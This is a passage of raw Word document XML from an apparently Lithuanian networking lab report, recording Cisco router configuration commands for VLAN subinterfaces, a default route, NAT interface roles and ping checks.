    </w:p>
    <w:p w14:paraId="16C287A7" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#int gig0/1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8C4591" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E7E68A" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#encapsulation dot1Q 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E94E4E" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#ip address 192.168.2.1 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE077E6" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#no shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CACE64C" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#ex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611C31D2" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#int gig0/1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AAB770" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#encapsulation dot1Q 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6DDAC3" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#ip address 192.168.3.1 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4771F5A1" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#no shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9665DD" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273E04EA" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3E8E2C" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#conf t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CBA57D" w14:textId="14FC855D" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="716D7877" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Enter configuration commands, one per line. End with CNTL/Z.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4A4578" w14:textId="679F4DEF" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25337F26" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#int gig0/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0A39EB" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501C858F" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1695A3FD" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#ip ad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3586CF49" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#ip address 213.234.10.2 255.255.255.252</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16830F73" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#no shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773AEBF3" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB3DB01" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#ip route 0.0.0.0 0.0.0.0 213.234.10.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B11B3E" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19425210" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5C3713" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#wr mem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34102D24" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#ping 213.234.10.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAAC436" w14:textId="5E8BCE24" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F62B2C7" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Success rate is 80 percent (4/5), round-trip min/avg/max = 0/0/1 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBCF412" w14:textId="45252B58" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09738768" w14:textId="24405E42" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#ping 213.234.20.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522FAD0F" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3E8FB6" w14:textId="4019F824" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Suk</w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>riame priegos sąrašą:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287A484F" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#conf t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E10236" w14:textId="31C89888" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D0130A8" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Enter configuration commands, one per line. End with CNTL/Z.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6982B856" w14:textId="6A8A00AF" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C023E89" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#int gig0/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABF6CDF" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#ip nat outside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CBCE18" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#ex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B91FFC2" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#int gig0/1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CD96FC" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#ip nat inside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D25B77B" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Router(config-subif)#ex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FEC016" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#int gig0/1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EE417A" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#ip nat inside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB658EC" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-subif)#end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D1CCFE" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256E4C18" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#conf t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BA4D01" w14:textId="45B0EBFF" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7913427A" w14:textId="7C8BE6AD" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="04B05B38" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Komutatoriaus </w:t>
      </w:r>
      <w:r w:rsidR="57D44AC9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="1D8984A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Switch0</w:t>
      </w:r>
      <w:r w:rsidR="0051309A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
